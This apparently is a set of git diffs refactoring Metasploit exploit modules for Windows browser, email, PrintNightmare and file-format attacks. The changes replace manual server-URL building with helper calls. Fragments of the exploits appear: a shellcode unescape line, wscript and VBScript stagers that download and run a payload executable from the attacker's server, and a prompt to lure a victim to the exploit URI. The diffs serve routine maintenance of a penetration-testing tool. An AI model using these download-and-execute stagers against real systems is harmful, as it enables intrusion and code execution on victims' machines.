@@ -197,13 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
     j_memory = rand_text_alpha(rand(100) + 1)
     j_counter = rand_text_alpha(rand(30) + 2)
 
-    host = get_srvhost + ":" + (datastore["SRVPORT"].to_s)
-    gif_uri = "http#{(datastore['SSL'] ? 's' : '')}://#{host}"
-    if ("/" == get_resource[-1, 1])
-      gif_uri << get_resource[0, get_resource.length - 1]
-    else
-      gif_uri << get_resource
-    end
+    gif_uri = get_uri(cli)
     gif_uri << "/" + Time.now.to_i.to_s + ".gif"
 
     js = %Q|#{j_shellcode}=unescape('#{shellcode}');

--- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb
+++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_srvhost
     # If the SRVHOST isn't the default 0.0.0.0, obviously the user wants to
     # specify, so we will not force source_address()
-    return datastore['SRVHOST'] if datastore['SRVHOST'] != '0.0.0.0'
+    return srvhost if srvhost != '0.0.0.0'
 
     Rex::Socket.source_address(cli.peerhost)
   end

--- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb
+++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb
@@ -116,14 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    if datastore['SSL']
-      schema = "https"
-    else
-      schema = "http"
-    end
-    uri = "#{schema}://#{my_host}"
-    uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6) + 3)}.exe"
+    uri = "#{get_uri(cli)}/#{rand_text_alpha(rand(6) + 3)}.exe"
 
     script = "var w=new ActiveXObject('wscript.shell');"
     script << "w.CurrentDirectory=w.ExpandEnvironmentStrings('\\%TEMP\\%');"

--- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb
+++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     if datastore['SSL']
       schema = "https"
     else

--- a/modules/exploits/windows/browser/persits_xupload_traversal.rb
+++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb
@@ -80,8 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
       exe_uri << "?" + token
 
-      exe_host = ""
-      exe_host << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost)
+      exe_host = srvhost_addr
 
       exe_hostport = datastore['SRVPORT']
 

--- a/modules/exploits/windows/browser/persits_xupload_traversal.rb
+++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
       exe_uri << "?" + token
 
       exe_host = ""
-      exe_host << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'])
+      exe_host << ((srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost)
 
       exe_hostport = datastore['SRVPORT']
 

--- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb
+++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb
@@ -85,8 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Payload's URL
-    payload_src = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
+    payload_src = "#{get_uri(cli)}/#{@payload_name}.exe"
 
     # Create the stager (download + execute payload)
     stager_name = rand_text_alpha(6) + ".vbs"

--- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb
+++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Payload's URL
-    payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_src = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
 
     # Create the stager (download + execute payload)

--- a/modules/exploits/windows/browser/safari_xslt_output.rb
+++ b/modules/exploits/windows/browser/safari_xslt_output.rb
@@ -70,9 +70,8 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    url = "http://"
-    url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
+    url = get_uri(cli)
+    url << '/' unless url.end_with?('/')
 
     content = <<~EOS
       <?xml-stylesheet type="text/xml" href="#fragment"?>

--- a/modules/exploits/windows/browser/safari_xslt_output.rb
+++ b/modules/exploits/windows/browser/safari_xslt_output.rb
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     url = "http://"
-    url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
 
     content = <<~EOS

--- a/modules/exploits/windows/browser/samsung_security_manager_put.rb
+++ b/modules/exploits/windows/browser/samsung_security_manager_put.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_name = rand_text_alpha(rand(10) + 5) + '.js'
 
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/" + js_name
 
     # we deliver the JavaScript code that does the work for us

--- a/modules/exploits/windows/browser/samsung_security_manager_put.rb
+++ b/modules/exploits/windows/browser/samsung_security_manager_put.rb
@@ -76,9 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_request_uri(cli, request)
     js_name = rand_text_alpha(rand(10) + 5) + '.js'
 
-    payload_url = "http://"
-    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/" + js_name
+    payload_url = "#{get_uri(cli)}/#{js_name}"
 
     # we deliver the JavaScript code that does the work for us
     if (request.uri.match(/.js/))

--- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
+++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
@@ -63,9 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    payload_url = "http://"
-    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
+    payload_url = "#{get_uri(cli)}/PAYLOAD"
 
     if (request.uri.match(/PAYLOAD/))
       return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
+++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
 
     if (request.uri.match(/PAYLOAD/))

--- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
+++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
@@ -54,9 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    payload_url = "http://"
-    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+    payload_url = "#{get_uri(cli)}/payload"
 
     if (request.uri.match(/payload/))
       return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
+++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
+++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
@@ -53,9 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    payload_url = "http://"
-    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+    payload_url = "#{get_uri(cli)}/payload"
 
     if (request.uri.match(/payload/))
       return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
+++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
@@ -104,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def prompt_uplay(cli, request)
     url = "http://"
-    url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
 
     path = "#{@exploit_unc}#{@share_name}\\#{@basename}.exe"
@@ -135,7 +135,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
   end
 
   def process_get(cli, request)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav = "\\\\#{myhost}\\"
 
     if blacklisted_path?(request.uri)
@@ -201,7 +201,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
     vprint_status("PROPFIND #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/
@@ -420,7 +420,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
       @uplay_uri = rand_text_alpha(8)
     end
 
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
 
     @exploit_unc = "\\\\#{myhost}\\"
 

--- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
@@ -103,9 +103,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def prompt_uplay(cli, request)
-    url = "http://"
-    url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
+    url = get_uri(cli)
+    url << '/' unless url.end_with?('/')
 
     path = "#{@exploit_unc}#{@share_name}\\#{@basename}.exe"
 
@@ -135,9 +134,6 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
   end
 
   def process_get(cli, request)
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    webdav = "\\\\#{myhost}\\"
-
     if blacklisted_path?(request.uri)
       vprint_status("GET => 404 [BLACKLIST] (#{request.uri})")
       resp = create_response(404, "Not Found")
@@ -199,10 +195,6 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
   def process_propfind(cli, request)
     path = request.uri
     vprint_status("PROPFIND #{path}")
-    body = ''
-
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/
 
@@ -420,16 +412,14 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
       @uplay_uri = rand_text_alpha(8)
     end
 
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
-
-    @exploit_unc = "\\\\#{myhost}\\"
+    @exploit_unc = "\\\\#{srvhost_addr}\\"
 
     if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
       fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
     end
 
     vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe")
-    print_good("Please let your victim browse to this exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}")
+    print_good("Please let your victim browse to this exploit URI: http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}/#{@uplay_uri}")
 
     super
   end

--- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb
+++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb
@@ -83,9 +83,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    webdav = "\\\\#{myhost}\\"
-
     if blacklisted_path?(request.uri)
       print_status("GET => 404 [BLACKLIST] (#{request.uri})")
       resp = create_response(404, "Not Found")
@@ -147,10 +144,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def process_propfind(cli, request)
     path = request.uri
     print_status("PROPFIND #{path}")
-    body = ''
-
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/
 
@@ -355,9 +348,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
-
-    @exploit_unc = "\\\\#{myhost}\\"
+    @exploit_unc = "\\\\#{srvhost_addr}\\"
 
     if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
       fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')

--- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb
+++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav = "\\\\#{myhost}\\"
 
     if blacklisted_path?(request.uri)
@@ -149,7 +149,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("PROPFIND #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/
@@ -355,7 +355,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
 
     @exploit_unc = "\\\\#{myhost}\\"
 

--- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
+++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
@@ -59,9 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    payload_url = "http://"
-    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
+    payload_url = "#{get_uri(cli)}/payload"
 
     if (request.uri.match(/payload/))
       return if ((p = regenerate_payload(cli)) == nil)

--- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
+++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     payload_url = "http://"
-    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_url += (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
 
     if (request.uri.match(/payload/))

--- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
+++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
@@ -141,8 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Payload's URL
-    payload_src = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
+    payload_src = "#{get_uri(cli)}/#{@payload_name}.exe"
 
     # Create the stager (download + execute payload)
     stager = build_vbs(payload_src)

--- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
+++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Payload's URL
-    payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    payload_src = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"
 
     # Create the stager (download + execute payload)

--- a/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb
+++ b/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb
@@ -154,14 +154,6 @@ class MetasploitModule < Msf::Exploit::Remote
     super
   end
 
-  def setup
-    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
-      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
-    end
-
-    super
-  end
-
   def start_service
     file_name << '.dll'
     self.file_contents = generate_payload_dll

--- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
+++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
@@ -103,9 +103,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    webdav = "\\\\#{myhost}\\"
-
     if (request.uri =~ /\.exe$/i)
       print_status "Sending EXE payload #{cli.peerhost}:#{cli.peerport} ..."
       return if ((p = regenerate_payload(cli)) == nil)
@@ -146,10 +143,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def process_propfind(cli, request)
     path = request.uri
     print_status("Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport} #{path}")
-    body = ''
-
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    my_uri = "http://#{my_host}/"
 
     if path =~ /\.exe$/i
       # Response for the DLL
@@ -318,7 +311,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['UNCHOST'])
       unc = datastore['UNCHOST'].dup
     else
-      unc = ((srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost)
+      unc = srvhost_addr
     end
 
     @exploit_unc_host = unc

--- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
+++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav = "\\\\#{myhost}\\"
 
     if (request.uri =~ /\.exe$/i)
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport} #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path =~ /\.exe$/i
@@ -318,7 +318,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['UNCHOST'])
       unc = datastore['UNCHOST'].dup
     else
-      unc = ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+      unc = ((srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost)
     end
 
     @exploit_unc_host = unc

--- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb
+++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb
@@ -99,9 +99,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    webdav = "\\\\#{myhost}\\"
-
     if (request.uri =~ /\.exe$/i)
       print_status "Sending EXE payload"
       return if ((p = regenerate_payload(cli)) == nil)
@@ -142,10 +139,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def process_propfind(cli, request)
     path = request.uri
     print_status("Received WebDAV PROPFIND request from: #{path}")
-    body = ''
-
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    my_uri = "http://#{my_host}/"
 
     if path =~ /\.exe$/i
       # Response for the DLL
@@ -314,7 +307,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['UNCHOST'])
       unc = datastore['UNCHOST'].dup
     else
-      unc = ((srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost)
+      unc = srvhost_addr
     end
 
     @exploit_unc_host = unc

--- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb
+++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb
@@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav = "\\\\#{myhost}\\"
 
     if (request.uri =~ /\.exe$/i)
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Received WebDAV PROPFIND request from: #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path =~ /\.exe$/i
@@ -314,7 +314,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['UNCHOST'])
       unc = datastore['UNCHOST'].dup
     else
-      unc = ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
+      unc = ((srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost)
     end
 
     @exploit_unc_host = unc

--- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
+++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
@@ -123,10 +123,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def process_propfind(cli, request)
     path = request.uri
     vprint_status("Received WebDAV PROPFIND request from: #{path}")
-    body = ''
-
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/
       if path.index(".")

--- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
+++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Received WebDAV PROPFIND request from: #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/

--- a/modules/exploits/windows/fileformat/ms12_005.rb
+++ b/modules/exploits/windows/fileformat/ms12_005.rb
@@ -214,7 +214,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    @ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    @ip = srvhost == '0.0.0.0' ? Rex::Socket.source_address('50.50.50.50') : srvhost
     @port = datastore['SRVPORT']
 
     print_status("Generating our docm file...")

--- a/modules/exploits/windows/fileformat/ms12_005.rb
+++ b/modules/exploits/windows/fileformat/ms12_005.rb
@@ -208,14 +208,14 @@ class MetasploitModule < Msf::Exploit::Remote
   # Return the malicious executable
   #
   def on_client_connect(cli)
-    print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@exe.length.to_s} bytes)")
+    print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@exe.length} bytes)")
     cli.put(@exe)
     service.close_client(cli)
   end
 
   def exploit
-    @ip = srvhost == '0.0.0.0' ? Rex::Socket.source_address('50.50.50.50') : srvhost
-    @port = datastore['SRVPORT']
+    @ip = srvhost_addr
+    @port = srvport
 
     print_status("Generating our docm file...")
     path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2012-0013')
@@ -227,7 +227,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Generating our malicious executable...")
     @exe = generate_payload_exe
 
-    print_status("Ready to deliver your payload on #{@ip}:#{@port.to_s}")
+    print_status("Ready to deliver your payload on #{Rex::Socket.to_authority(@ip, @port)}")
     super
   end
 end

--- a/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb
+++ b/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
     <script language="VBScript">
     On Error Resume Next
     Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
-    #{name_xmlhttp}.open "GET","http://#{url}",False
+    #{name_xmlhttp}.open "GET","#{url}",False
     #{name_xmlhttp}.send
     Set #{name_adodb} = CreateObject("ADODB.Stream")
     #{name_adodb}.Open
@@ -119,13 +119,8 @@ class MetasploitModule < Msf::Exploit::Remote
     @payload_name = rand_text_alpha(4)
     @temp_folder = "/Windows/Temp"
     register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
-    if srvhost == '0.0.0.0'
-      lhost = Rex::Socket.source_address('50.50.50.50')
-    else
-      lhost = srvhost
-    end
-    payload_src = lhost
-    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
+
+    payload_src = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{datastore['URIPATH']}#{@payload_name}.exe"
     stager_name = rand_text_alpha(6) + ".vbs"
     pdf = %Q|%PDF-1.7
     4 0 obj

--- a/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb
